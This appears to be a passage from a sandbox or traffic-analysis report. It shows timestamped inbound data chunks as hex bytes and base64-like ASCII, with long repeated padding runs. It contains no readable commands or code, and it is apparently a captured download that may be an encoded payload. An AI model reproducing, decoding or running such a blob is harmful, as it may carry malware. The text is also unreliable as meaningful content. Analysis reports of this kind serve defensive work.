2023-03-02 16:18:25 UTC	117	IN	Data Raw: 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 Data Ascii: ABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABb
2023-03-02 16:18:25 UTC	118	IN	Data Raw: 76 41 59 37 75 6a 2f 2b 36 75 6d 6d 58 4b 46 57 6d 62 48 6c 75 2b 47 78 32 6c 61 6a 6a 38 53 57 32 61 51 31 6c 65 4d 58 4c 54 62 6b 59 63 64 38 53 35 47 6e 68 66 34 39 2f 7a 54 61 54 57 65 6b 54 39 67 43 4f 65 5a 61 54 4d 2b 30 4e 2b 56 6e 30 54 38 63 72 2b 70 78 7a 59 4d 32 4e 64 67 50 64 5a 47 72 78 58 75 33 6a 7a 62 6f 47 59 48 4a 5a 78 4f 58 37 61 39 6f 79 63 36 68 73 63 33 30 65 4d 7a 61 56 70 6d 42 57 31 61 4d 48 6c 62 51 42 72 69 36 4c 52 64 47 7a 5a 5a 35 77 47 4e 5a 66 51 65 36 4a 78 44 52 54 68 65 37 38 47 45 68 4e 52 42 4e 6c 6f 34 6b 64 63 57 6a 53 58 58 32 35 43 4c 6e 62 33 62 52 70 39 61 65 4d 4a 71 43 66 70 4f 69 6c 4e 56 57 67 39 6a 71 4c 4a 6c 71 35 58 2f 2b 33 59 4c 45 46 57 74 34 4c 39 33 76 49 31 7a 37 66 70 6d 51 72 41 42 41 45 4b 6a Data Ascii: vAY7uj/+6ummXKFWmbHlu+Gx2lajj8SW2aQ1leMXLTbkYcd8S5Gnhf49/zTaTWekT9gCOeZaTM+0N+Vn0T8cr+pxzYM2NdgPdZGrxXu3jzboGYHJZxOX7a9oyc6hsc30eMzaVpmBW1aMHlbQBri6LRdGzZZ5wGNZfQe6JxDRThe78GEhNRBNlo4kdcWjSXX25CLnb3bRp9aeMJqCfpOilNVWg9jqLJlq5X/+3YLEFWt4L93vI1z7fpmQrABAEKj
2023-03-02 16:18:25 UTC	119	IN	Data Raw: 4b 32 32 31 6a 44 52 37 39 43 63 4b 71 76 6a 42 4e 78 4f 6d 46 66 56 36 6f 37 50 57 6a 6c 4f 4c 42 6f 77 65 59 75 70 4b 44 66 6f 72 4f 72 43 67 54 37 6e 41 52 6c 78 62 2b 37 6f 6e 45 51 59 4a 68 67 33 57 2b 43 37 5a 2f 62 30 50 4f 4d 63 47 46 36 49 4d 65 6a 65 43 4a 30 36 54 32 61 68 55 49 73 2f 6f 65 79 4c 4f 45 77 6b 52 6a 52 39 79 78 56 6a 2b 75 69 6f 73 72 4f 71 6e 65 63 31 52 33 77 36 38 65 69 6f 76 41 4a 72 38 4f 63 74 36 34 33 2b 6f 54 72 47 37 79 52 67 53 66 74 43 6b 53 6c 73 4d 65 51 64 61 69 73 4b 35 4f 4f 38 35 47 58 70 63 61 73 52 69 4d 66 70 6f 50 4f 63 44 39 2b 33 6e 64 4d 79 6d 35 50 4b 6c 6f 34 52 41 2f 7a 69 6e 4d 47 48 41 4f 42 44 39 34 35 4e 56 6c 74 6d 54 75 78 43 5a 38 64 70 6c 6f 58 62 74 30 34 75 43 35 37 68 62 4d 59 45 75 57 4b 6a Data Ascii: K221jDR79CcKqvjBNxOmFfV6o7PWjlOLBoweYupKDforOrCgT7nARlxb+7onEQYJhg3W+C7Z/b0POMcGF6IMejeCJ06T2ahUIs/oeyLOEwkRjR9yxVj+uiosrOqnec1R3w68eiovAJr8Oct643+oTrG7yRgSftCkSlsMeQdaisK5OO85GXpcasRiMfpoPOcD9+3ndMym5PKlo4RA/zinMGHAOBD945NVltmTuxCZ8dploXbt04uC57hbMYEuWKj
2023-03-02 16:18:25 UTC	120	IN	Data Raw: 4f 4c 62 6c 2b 51 63 47 65 4a 47 6d 50 45 6e 4c 32 62 54 66 7a 4c 46 41 39 67 70 65 5a 2f 32 32 31 56 75 6c 71 78 70 41 31 4d 39 48 2f 2b 51 38 74 49 70 53 61 42 63 33 33 5a 71 78 77 6e 64 70 30 52 4d 50 55 61 71 50 62 64 42 33 39 75 56 72 58 38 2f 49 55 61 61 39 34 34 2b 50 39 4e 56 4d 54 53 48 4b 77 32 46 69 62 68 38 34 4d 62 66 45 61 65 4d 58 4d 63 79 43 75 31 43 43 6c 68 6d 78 7a 2f 6b 6c 52 79 76 32 65 63 78 61 57 68 77 32 4f 69 73 78 6d 4e 39 2f 75 63 42 78 4f 68 64 41 4f 42 4d 6a 6e 6f 33 70 32 61 44 53 78 41 61 6f 32 6b 45 6a 6b 49 77 57 32 5a 4f 35 41 70 6b 78 32 6e 54 70 35 62 69 31 7a 62 46 61 56 71 4f 49 6c 42 61 5a 67 75 4b 79 32 46 31 55 7a 42 6e 4c 39 30 51 5a 38 63 37 34 4b 46 62 4a 55 48 6e 4e 5a 6d 6c 76 54 54 6f 6d 4f 38 57 69 72 58 6e Data Ascii: OLbl+QcGeJGmPEnL2bTfzLFA9gpeZ/221VulqxpA1M9H/+Q8tIpSaBc33Zqxwndp0RMPUaqPbdB39uVrX8/IUaa944+P9NVMTSHKw2Fibh84MbfEaeMXMcyCu1CClhmxz/klRyv2ecxaWhw2OisxmN9/ucBxOhdAOBMjno3p2aDSxAao2kEjkIwW2ZO5Apkx2nTp5bi1zbFaVqOIlBaZguKy2F1UzBnL90QZ8c74KFbJUHnNZmlvTTomO8WirXn
2023-03-02 16:18:25 UTC	122	IN	Data Raw: 6b 77 6b 51 6a 64 2b 66 48 78 56 69 65 69 62 57 6c 5a 78 55 4f 63 32 6e 45 31 36 53 4f 69 72 77 6d 63 2b 6a 65 2f 32 6d 42 67 4e 2b 74 4f 79 51 61 6b 66 31 45 64 57 45 73 6b 78 33 6d 46 61 50 33 33 4e 41 30 57 6c 67 66 35 65 78 6d 6e 54 34 33 64 70 57 6d 59 4c 68 66 41 4b 45 62 74 58 51 4a 58 69 46 33 36 56 30 39 38 4a 57 6e 2f 62 6c 4b 6e 31 74 49 42 47 71 33 39 70 47 37 58 62 6a 4e 64 71 43 71 74 4f 65 36 67 2f 54 74 55 47 37 4a 62 73 70 72 78 45 65 57 37 4d 54 5a 36 79 74 71 71 47 57 6a 78 39 6f 75 7a 6e 6a 34 45 43 58 73 5a 70 30 79 4f 54 50 2b 52 66 48 51 6c 6e 35 7a 46 32 61 46 57 76 36 4b 7a 30 79 39 66 2f 35 7a 47 70 61 63 76 6a 36 4c 51 53 45 43 6d 4f 37 39 47 61 39 4b 48 77 32 74 51 56 6d 2b 6d 65 44 78 70 49 64 36 71 35 63 6e 45 6d 78 7a 63 4d Data Ascii: kwkQjd+fHxVieibWlZxUOc2nE16SOirwmc+je/2mBgN+tOyQakf1EdWEskx3mFaP33NA0Wlgf5exmnT43dpWmYLhfAKEbtXQJXiF36V098JWn/blKn1tIBGq39pG7XbjNdqCqtOe6g/TtUG7JbsprxEeW7MTZ6ytqqGWjx9ouznj4ECXsZp0yOTP+RfHQln5zF2aFWv6Kz0y9f/5zGpacvj6LQSECmO79Ga9KHw2tQVm+meDxpId6q5cnEmxzcM
2023-03-02 16:18:25 UTC	123	IN	Data Raw: 76 30 41 4d 33 53 6d 47 55 6a 62 6f 42 53 6c 53 45 6d 56 30 2f 38 48 63 68 44 62 6c 4e 39 7a 6b 37 6c 47 71 78 6e 6a 52 44 41 4b 2b 6b 36 4a 57 33 5a 61 44 32 4f 2f 75 6d 32 31 73 6d 43 58 63 39 4f 76 61 54 78 66 42 54 48 62 6e 42 36 76 48 6d 65 64 50 39 48 54 69 32 74 61 5a 67 75 43 73 7a 52 76 43 47 74 65 63 6f 46 47 45 48 35 75 73 74 53 45 61 46 71 71 4d 65 46 34 6e 55 61 65 4e 4a 45 61 4b 47 4c 30 6e 46 6e 77 79 47 42 6f 41 2b 2b 4b 4e 65 43 38 4e 73 44 78 6a 6e 31 64 57 32 5a 4f 4c 41 4b 71 4c 74 69 2b 48 54 69 6f 61 43 48 35 58 6f 48 74 69 6a 57 57 6c 37 4d 51 70 55 79 56 43 7a 50 6c 37 51 36 6f 34 47 79 75 66 34 70 41 51 75 43 63 44 57 5a 7a 71 69 6b 47 54 6a 34 4a 47 4d 73 37 74 45 57 79 47 66 4e 6f 57 71 6f 75 74 37 4f 32 62 51 53 62 79 61 78 38 Data Ascii: v0AM3SmGUjboBSlSEmV0/8HchDblN9zk7lGqxnjRDAK+k6JW3ZaD2O/um21smCXc9OvaTxfBTHbnB6vHmedP9HTi2taZguCszRvCGtecoFGEH5ustSEaFqqMeF4nUaeNJEaKGL0nFnwyGBoA++KNeC8NsDxjn1dW2ZOLAKqLti+HTioaCH5XoHtijWWl7MQpUyVCzPl7Q6o4Gyuf4pAQuCcDWZzqikGTj4JGMs7tEWyGfNoWqout7O2bQSbyax8
2023-03-02 16:18:25 UTC	124	IN	Data Raw: 6c 39 55 33 52 48 62 56 57 6a 39 67 4c 47 58 30 59 58 39 48 35 4a 76 6e 66 6a 66 4a 32 4d 62 4e 63 73 66 6b 50 58 54 67 63 35 75 78 77 42 43 76 79 78 6b 4c 71 77 69 54 30 36 46 78 64 45 56 61 54 78 66 46 7a 5a 69 6d 35 2f 67 35 30 2f 46 61 56 6f 77 65 57 52 71 64 41 2f 6f 6e 44 45 6a 66 62 4c 6e 4d 56 63 55 4b 4b 44 6f 72 44 79 64 41 49 33 76 32 5a 32 62 30 79 4e 79 4b 61 4f 34 66 48 66 69 46 37 32 51 5a 70 6e 57 77 6a 6e 75 57 41 6e 64 39 54 4b 4e 6d 45 61 71 4e 72 77 64 53 74 75 6c 4a 71 44 79 70 45 61 71 32 32 64 69 63 77 6a 36 54 6f 74 62 66 46 70 52 6b 52 54 45 67 6d 55 58 56 2b 71 6d 45 4c 4e 4d 4b 51 48 48 37 61 38 38 4f 7a 4c 62 6f 64 58 4c 57 49 42 47 6e 74 33 47 74 68 55 4b 33 69 35 72 61 6a 76 79 73 63 6b 4e 6b 6b 54 4c 69 4e 4e 4d 58 77 35 6c Data Ascii: l9U3RHbVWj9gLGX0YX9H5JvnfjfJ2MbNcsfkPXTgc5uxwBCvyxkLqwiT06FxdEVaTxfFzZim5/g50/FaVoweWRqdA/onDEjfbLnMVcUKKDorDydAI3v2Z2b0yNyKaO4fHfiF72QZpnWwjnuWAnd9TKNmEaqNrwdStulJqDypEaq22dicwj6TotbfFpRkRTEgmUXV+qmELNMKQHH7a88OzLbodXLWIBGnt3GthUK3i5rajvysckNkkTLiNNMXw5l
2023-03-02 16:18:25 UTC	125	IN	Data Raw: 38 2b 67 6b 76 38 4f 36 50 52 75 61 51 54 6e 42 4d 50 6e 4a 63 54 6f 73 63 42 36 4b 6c 6b 77 65 54 68 32 73 6a 4c 6f 72 4b 65 62 6b 2b 6e 6e 41 52 6e 56 74 33 37 67 5a 4a 5a 35 67 57 65 4e 78 2b 6b 4c 6a 44 47 6f 6d 78 51 6e 73 4d 42 57 31 32 6b 45 70 5a 54 53 4d 78 75 4d 67 64 75 6c 6f 66 46 4c 6e 45 61 61 4c 4b 46 4d 42 74 75 56 66 72 71 4d 36 35 66 31 30 34 62 47 63 63 64 65 42 42 70 56 6c 31 33 6e 4b 6f 30 6e 6b 4b 41 56 5a 5a 75 6a 37 74 66 69 77 48 58 48 55 61 59 2b 2f 72 4d 42 4e 58 78 44 75 78 7a 46 36 4c 46 30 56 50 75 53 35 7a 51 6f 77 41 68 61 36 4c 45 2f 46 4f 2f 2b 4e 46 76 67 75 47 66 64 39 4e 2b 76 76 6d 47 71 78 4b 74 77 57 6e 67 5a 39 66 43 71 58 41 51 68 42 6f 5a 53 61 39 66 48 44 39 75 64 79 77 30 41 34 68 77 79 44 64 6d 64 73 37 61 54 Data Ascii: 8+gkv8O6PRuaQTnBMPnJcToscB6KlkweTh2sjLorKebk+nnARnVt37gZJZ5gWeNx+kLjDGomxQnsMBW12kEpZTSMxuMgdulofFLnEaaLKFMBtuVfrqM65f104bGccdeBBpVl13nKo0nkKAVZZuj7tfiwHXHUaY+/rMBNXxDuxzF6LF0VPuS5zQowAha6LE/FO/+NFvguGfd9N+vvmGqxKtwWngZ9fCqXAQhBoZSa9fHD9udyw0A4hwyDdmds7aT
2023-03-02 16:18:25 UTC	127	IN	Data Raw: 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 Data Ascii: ABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABb
2023-03-02 16:18:25 UTC	128	IN	Data Raw: 38 4c 47 61 56 72 59 6b 37 52 53 41 77 75 66 59 66 72 57 49 50 52 51 42 67 46 79 35 44 45 77 76 2f 4c 37 62 7a 71 71 4c 49 5a 50 59 2f 57 2f 32 6e 62 77 74 6e 47 5a 30 4f 69 63 31 45 57 39 38 4b 6f 79 32 36 6a 37 66 65 76 6c 2f 62 79 73 58 56 78 58 6c 5a 58 6e 4b 52 58 54 4b 68 44 6f 74 4f 41 52 2b 57 4a 6e 4e 2b 4c 76 77 73 5a 70 57 6a 52 39 2f 4b 4a 49 42 4f 69 6f 73 63 67 45 62 75 63 31 72 67 39 34 59 65 69 6f 46 36 50 54 4c 65 63 46 5a 57 4e 2b 48 75 42 59 69 51 54 59 52 64 39 34 6d 56 6f 38 41 47 6b 39 48 43 5a 6c 32 31 62 36 46 6e 6e 76 52 6c 6c 41 67 58 67 39 44 4e 67 38 68 6b 45 70 52 70 2f 6d 36 67 7a 36 32 36 41 4b 4c 4f 36 5a 52 6f 64 4f 7a 30 4f 31 30 31 41 7a 65 74 39 75 4f 4c 6d 41 62 67 52 2b 75 46 31 78 74 31 6f 34 52 6c 6e 6b 2f 54 67 6d Data Ascii: 8LGaVrYk7RSAwufYfrWIPRQBgFy5DEwv/L7bzqqLIZPY/W/2nbwtnGZ0Oic1EW98Koy26j7fevl/bysXVxXlZXnKRXTKhDotOAR+WJnN+LvwsZpWjR9/KJIBOioscgEbuc1rg94YeioF6PTLecFZWN+HuBYiQTYRd94mVo8AGk9HCZl21b6FnnvRllAgXg9DNg8hkEpRp/m6gz626AKLO6ZRodOz0O101Azet9uOLmAbgR+uF1xt1o4Rlnk/Tgm
2023-03-02 16:18:25 UTC	129	IN	Data Raw: 32 71 73 61 2b 69 7a 54 45 68 74 37 4f 63 47 48 51 56 63 7a 6a 2f 47 37 79 46 6f 56 50 74 43 6b 79 31 6a 4b 58 4f 31 6a 77 43 31 41 61 33 48 37 49 6f 34 52 35 57 4a 50 30 5a 42 33 6e 59 6a 32 74 74 6d 73 39 6f 77 71 4a 54 53 63 66 42 41 6f 39 75 56 49 43 36 39 38 30 61 61 6c 72 65 6e 4e 74 4e 64 4e 72 6c 51 78 78 73 59 6a Data Ascii: 2qsa+izTEht7OcGHQVczj/G7yFoVPtCky1jKXO1jwC1Aa3H7Io4R5WJP0ZB3nYj2ttms9owqJTScfBAo9uVIC6980aalrenNtNdNrlQxxsYj
2023-03-02 16:18:25 UTC	129	IN	Data Raw: 2f 4b 6d 63 73 67 7a 66 4e 49 51 2b 6b 64 70 41 65 66 33 41 52 39 4a 2b 44 76 67 4e 55 79 71 7a 75 63 31 65 51 42 73 32 65 69 77 6d 41 78 4d 30 4f 63 74 4c 46 2f 43 78 2b 42 51 6b 36 49 43 33 33 62 78 6d 6a 4d 5a 4d 6c 58 73 48 4d 63 7a 30 2f 73 4a 61 46 70 6d 66 44 57 56 6e 59 49 2b 35 59 2f 6d 57 51 33 6e 4d 49 70 39 36 5a 62 6f 72 57 7a 42 31 6c 7a 76 30 4a 30 79 56 4b 70 33 33 73 2b 68 43 50 7a 44 49 4c 48 62 5a 70 6a 6f 73 57 70 38 75 52 58 6e 4e 4d 53 71 42 35 50 6f 6d 57 48 63 33 41 63 77 65 61 33 44 44 42 48 6f 72 41 46 30 70 46 37 6e 4d 58 43 41 76 63 54 6f 6e 43 44 58 36 6e 51 32 57 2b 43 36 62 2f 66 30 50 4f 4d 32 46 46 79 50 41 47 72 35 6f 39 7a 74 44 70 44 48 44 32 4f 31 6e 2b 79 51 4f 4d 61 78 30 66 73 4a 61 46 70 6d 6b 4e 59 71 6d 6e 59 77 Data Ascii: /KmcsgzfNIQ+kdpAef3AR9J+DvgNUyqzuc1eQBs2eiwmAxM0OctLF/Cx+BQk6IC33bxmjMZMlXsHMcz0/sJaFpmfDWVnYI+5Y/mWQ3nMIp96ZborWzB1lzv0J0yVKp33s+hCPzDILHbZpjosWp8uRXnNMSqB5PomWHc3Acwea3DDBHorAF0pF7nMXCAvcTonCDX6nQ2W+C6b/f0POM2FFyPAGr5o9ztDpDHD2O1n+yQOMax0fsJaFpmkNYqmnYw
2023-03-02 16:18:25 UTC	130	IN	Data Raw: 68 42 6e 78 7a 4b 64 5a 67 4b 58 64 70 2b 52 31 2f 61 35 5a 4d 62 62 6b 4c 2f 71 72 6b 35 47 6e 34 34 37 6b 4f 34 4e 2b 6b 36 4f 55 31 46 61 44 39 2b 6b 75 57 43 71 39 50 63 4d 70 53 32 63 4d 56 41 33 54 33 48 59 79 68 30 56 6d 32 33 48 44 32 4f 6c 6d 4f 79 59 4f 45 5a 5a 6f 31 76 7a 44 74 74 4f 6b 75 71 46 6e 45 5a 5a 50 53 65 52 38 51 7a 59 50 64 4b 31 34 30 61 76 39 49 53 49 44 64 75 51 32 56 39 6e 43 6b 61 66 74 7a 6c 43 34 4e 75 67 59 6d 41 69 6c 70 62 31 30 34 66 47 57 4d 63 41 51 71 6b 6e 62 43 31 4d 6d 33 4b 45 46 54 5a 73 31 5a 58 6e 41 4d 65 66 6d 35 32 65 55 59 49 34 43 34 58 55 46 4b 6a 7a 78 59 36 45 62 4f 31 47 42 32 35 33 31 65 65 70 58 54 64 2b 58 61 5a 54 77 75 69 72 4a 78 71 48 37 2b 63 75 48 48 75 39 64 2b 42 44 6a 72 53 4a 47 31 38 31 Data Ascii: hBnxzKdZgKXdp+R1/a5ZMbbkL/qrk5Gn447kO4N+k6OU1FaD9+kuWCq9PcMpS2cMVA3T3HYyh0Vm23HD2OlmOyYOEZZo1vzDttOkuqFnEZZPSeR8QzYPdK140av9ISIDduQ2V9nCkaftzlC4NugYmAilpb104fGWMcAQqknbC1Mm3KEFTZs1ZXnAMefm52eUYI4C4XUFKjzxY6EbO1GB2531eepXTd+XaZTwuirJxqH7+cuHHu9d+BDjrSJG181
2023-03-02 16:18:25 UTC	132	IN	Data Raw: 64 4d 4d 32 4c 78 75 38 49 78 47 6e 32 34 33 2b 63 4c 62 6b 4c 4e 62 6c 36 74 47 68 32 45 43 6e 75 58 54 61 44 66 58 37 43 5a 4a 68 51 4e 4a 47 70 74 33 6b 2f 2f 68 38 36 79 6e 35 31 6f 34 6c 64 4f 46 4e 50 44 70 32 35 53 35 4d 4c 36 64 52 70 73 36 41 69 2f 4e 32 34 77 47 42 32 47 35 6c 2f 58 54 68 73 5a 35 78 77 42 43 6d 43 35 6f 4e 58 62 41 43 33 50 78 2b 78 31 48 4c 6e 4c 52 47 59 62 4e 5a 58 74 65 76 69 48 48 44 32 4f 31 6e 2b 32 54 50 45 37 38 59 32 54 48 61 65 43 4c 2b 45 67 62 4e 48 31 6b 39 78 6b 69 36 4b 67 41 78 57 48 67 35 77 58 38 43 2b 35 6e 50 38 62 76 49 57 68 4d 2b 30 4b 6e 49 32 55 6c 34 43 34 50 78 31 47 6d 4f 4b 46 51 69 54 78 47 6d 36 78 5a 31 51 79 57 6b 69 54 7a 76 4b 4d 79 72 73 2b 66 57 44 62 6e 44 37 50 54 6a 2b 63 31 57 41 6b 59 Data Ascii: dMM2Lxu8IxGn243+cLbkLNbl6tGh2ECnuXTaDfX7CZJhQNJGpt3k//h86yn51o4ldOFNPDp25S5ML6dRps6Ai/N24wGB2G5l/XThsZ5xwBCmC5oNXbAC3Px+x1HLnLRGYbNZXteviHHD2O1n+2TPE78Y2THaeCL+EgbNH1k9xki6KgAxWHg5wX8C+5nP8bvIWhM+0KnI2Ul4C4Px1GmOKFQiTxGm6xZ1QyWkiTzvKMyrs+fWDbnD7PTj+c1WAkY
2023-03-02 16:18:25 UTC	133	IN	Data Raw: 69 45 78 50 4f 63 35 7a 73 73 38 52 70 2b 66 2f 4c 6c 53 6c 6f 69 54 65 42 6b 4e 4c 58 2f 42 5a 38 51 36 34 66 68 2b 41 41 7a 6e 4e 49 42 70 4f 56 6e 6f 71 52 66 68 31 62 66 6e 4e 47 2f 32 37 4f 4c 67 55 59 68 59 4a 65 7a 64 33 2f 7a 69 5a 70 78 6f 71 75 31 79 34 46 74 6d 78 7a 72 68 31 54 58 76 7a 4f 63 30 46 6f 6a 4e 2b 2b 69 70 76 6a 33 53 6d 65 63 30 70 5a 7a 48 4b 65 69 78 76 74 74 65 33 65 2f 4d 6e 33 2b 33 35 51 58 65 4b 38 50 51 7a 79 39 65 5a 52 6d 2b 6e 47 6b 42 4e 58 78 4e 2b 6d 4c 69 36 4b 6d 56 30 73 6a 63 35 7a 54 79 76 59 64 50 36 4c 46 41 36 32 6c 65 35 7a 52 50 66 53 4c 67 4f 4d 62 76 4a 6d 42 44 2b 36 46 51 6a 42 7a 46 69 37 33 5a 70 32 6c 69 69 5a 34 50 33 37 79 63 71 70 61 57 39 6e 72 50 42 4b 43 51 2f 53 37 64 45 4a 79 39 58 43 57 61 Data Ascii: iExPOc5zss8Rp+f/LlSloiTeBkNLX/BZ8Q64fh+AAznNIBpOVnoqRfh1bfnNG/27OLgUYhYJezd3/ziZpxoqu1y4Ftmxzrh1TXvzOc0FojN++ipvj3Smec0pZzHKeixvtte3e/Mn3+35QXeK8PQzy9eZRm+nGkBNXxN+mLi6KmV0sjc5zTyvYdP6LFA62le5zRPfSLgOMbvJmBD+6FQjBzFi73Zp2liiZ4P37ycqpaW9nrPBKCQ/S7dEJy9XCWa
2023-03-02 16:18:25 UTC	134	IN	Data Raw: 50 2b 63 4f 4f 50 4c 59 75 63 41 35 79 35 30 45 6e 6d 67 36 4b 75 76 2b 53 6c 5a 35 79 37 4c 62 76 4d 4c 36 4c 50 52 36 66 4e 35 37 38 61 4b 71 76 4c 48 4d 4e 50 6a 62 6d 68 61 5a 6e 2f 56 64 2f 49 64 70 61 30 44 6e 43 63 34 48 53 34 49 57 70 73 75 61 34 66 52 6d 56 46 6a 59 33 66 54 49 37 69 52 31 2f 64 34 4d 4d 33 62 69 42 44 57 6a 35 46 47 6e 2b 7a 48 45 31 50 62 6b 49 4a 33 69 36 64 47 72 34 46 34 48 4d 44 54 57 44 61 58 69 75 6d 72 58 57 48 6b 4d 66 4f 59 63 78 6c 52 59 7a 71 77 61 51 52 54 73 70 76 55 43 51 75 44 6e 6d 55 6a 44 61 34 57 33 51 73 41 6f 79 63 74 52 7a 56 38 61 4b 6c 2b 57 75 69 5a 4b 41 6b 54 50 4f 63 30 47 58 48 2f 53 4f 69 78 57 53 31 6a 31 75 2f 30 6e 65 6e 69 48 31 56 73 42 62 51 43 69 4a 38 39 74 49 4e 6d 6e 46 78 48 66 45 53 2f Data Ascii: P+cOOPLYucA5y50Enmg6Kuv+SlZ5y7LbvML6LPR6fN578aKqvLHMNPjbmhaZn/Vd/Idpa0DnCc4HS4IWpsua4fRmVFjY3fTI7iR1/d4MM3biBDWj5FGn+zHE1PbkIJ3i6dGr4F4HMDTWDaXiumrXWHkMfOYcxlRYzqwaQRTspvUCQuDnmUjDa4W3QsAoyctRzV8aKl+WuiZKAkTPOc0GXH/SOixWS1j1u/0neniH1VsBbQCiJ89tINmnFxHfES/
2023-03-02 16:18:25 UTC	135	IN	Data Raw: 31 39 32 2f 56 36 2b 66 31 64 41 50 4f 79 62 61 51 6d 4e 34 43 54 47 79 48 7a 37 56 44 2f 7a 6a 4e 62 2b 4f 75 50 36 67 68 51 57 6d 7a 30 34 69 68 66 36 61 64 4c 49 61 4a 35 64 76 2b 70 66 6c 4e 44 47 49 37 6f 6c 70 79 2b 50 70 5a 6b 34 4d 67 45 41 2f 72 4d 43 6f 55 49 34 57 47 62 48 4c 45 66 37 52 71 57 72 65 69 43 46 55 37 73 62 4f 4e 6e 45 62 43 65 47 48 78 2b 79 31 50 6c 32 36 4f 38 33 78 57 6c 61 42 65 34 72 79 6a 46 34 4e 68 75 32 70 2b 69 74 6d 4b 79 58 6c 2b 63 77 33 30 2f 48 2b 75 69 74 63 66 6e 6d 79 6a 5a 62 34 4c 70 76 2f 2f 52 6a 70 37 4a 68 71 39 43 31 46 2f 4b 4b 54 59 64 59 32 2b 55 6f 66 6a 6e 37 54 59 70 6d 6f 56 43 51 50 6b 65 54 71 7a 6c 47 33 41 74 6b 78 32 6b 66 6e 33 63 53 43 64 32 78 64 65 48 42 52 71 6f 74 5a 46 31 75 32 34 30 71 Data Ascii: 192/V6+f1dAPOybaQmN4CTGyHz7VD/zjNb+OuP6ghQWmz04ihf6adLIaJ5dv+pflNDGI7olpy+PpZk4MgEA/rMCoUI4WGbHLEf7RqWreiCFU7sbONnEbCeGHx+y1Pl26O83xWlaBe4ryjF4Nhu2p+itmKyXl+cw30/H+uitcfnmyjZb4Lpv//Rjp7Jhq9C1F/KKTYdY2+Uofjn7TYpmoVCQPkeTqzlG3Atkx2kfn3cSCd2xdeHBRqotZF1u240q
2023-03-02 16:18:25 UTC	136	IN	Data Raw: 69 38 52 33 50 4c 41 64 6b 79 61 52 45 61 75 39 76 33 54 62 69 68 6f 30 74 43 72 41 71 35 6d 6e 7a 72 68 34 53 30 76 4c 2b 63 30 79 2b 79 6a 57 65 69 70 48 73 70 4f 39 2b 63 30 2f 62 7a 62 58 2b 69 70 72 33 42 77 68 4f 2f 4d 6d 68 7a 2b 56 49 58 75 56 34 55 63 6c 6b 2b 41 50 64 36 6b 72 67 79 34 70 38 63 79 57 36 56 4d 37 47 4e 6b 78 32 6b 49 33 48 49 54 6c 77 31 47 6d 37 39 53 59 34 62 62 6a 46 74 6a 70 4c 74 47 67 34 36 63 70 4d 66 62 6a 43 63 68 58 5a 35 4f 59 36 77 71 43 46 51 2b 48 47 59 6d 55 42 67 52 54 67 69 77 79 78 35 61 50 41 75 4a 6a 53 72 48 72 6c 6e 33 36 2b 2b 58 4d 58 69 61 48 4a 79 32 36 4b 31 6d 50 4f 2b 39 35 7a 44 72 4f 75 59 69 36 4b 30 39 50 69 75 6f 35 7a 42 44 66 39 68 47 4f 73 62 76 4a 47 42 68 2b 36 46 51 70 52 33 4c 6e 53 69 63 Data Ascii: i8R3PLAdkyaREau9v3Tbiho0tCrAq5mnzrh4S0vL+c0y+yjWeipHspO9+c0/bzbX+ipr3BwhO/Mmhz+VIXuV4Uclk+APd6krgy4p8cyW6VM7GNkx2kI3HITlw1Gm79SY4bbjFtjpLtGg46cpMfbjCchXZ5OY6wqCFQ+HGYmUBgRTgiwyx5aPAuJjSrHrln36++XMXiaHJy26K1mPO+95zDrOuYi6K09Piuo5zBDf9hGOsbvJGBh+6FQpR3LnSic
